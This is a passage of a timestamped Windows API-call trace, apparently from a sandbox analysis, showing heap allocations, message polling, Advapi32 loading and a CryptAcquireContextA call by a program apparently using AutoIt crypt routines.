Flags=0x0, Size=0x10) returned 0x2e50e48 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.313] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0228.313] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0228.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0228.314] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0228.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0228.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0228.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.315] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0228.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.322] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0228.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.322] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0228.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0228.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0228.322] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.323] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.323] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.324] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0228.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.324] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.325] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0228.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0228.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0228.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0228.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.325] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0228.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, 